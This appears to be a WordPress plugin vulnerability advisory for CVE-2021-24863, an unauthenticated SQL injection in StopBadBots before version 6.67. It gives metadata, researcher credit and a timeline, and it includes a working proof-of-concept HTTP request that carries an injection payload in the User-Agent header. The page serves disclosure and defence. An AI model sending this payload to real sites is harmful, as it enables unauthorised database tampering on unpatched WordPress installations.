StopBadBots < 6.67 – Unauthenticated SQL Injection | CVE 2021-24863 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the User Agent before using it in a SQL statement to save it, leading to a SQL injection

Proof of Concept

GET / HTTP/1.1
User-Agent: Zongbot' where id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'-- -
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

Fixed in 6.67

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

1e4dd002-6c96-44f9-bd55-61359265f7ae

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2014-09-26

Title

All In One WP Security plugin 3.8.2 - 2xSQL Injections

Published

2023-09-04

Title

Woocommerce Support System < 1.2.2 - Admin+ SQLi

Published

2017-07-22

Title

wordpress-gallery-transformation 1.0 - Blind SQL Injection

Published

2014-08-01

Title

RLSWordPressSearch - register.php agentid Parameter SQL Injection

Published

2023-04-19

Title

Shortcode IMDB <= 6.0.8 - Admin+ SQLi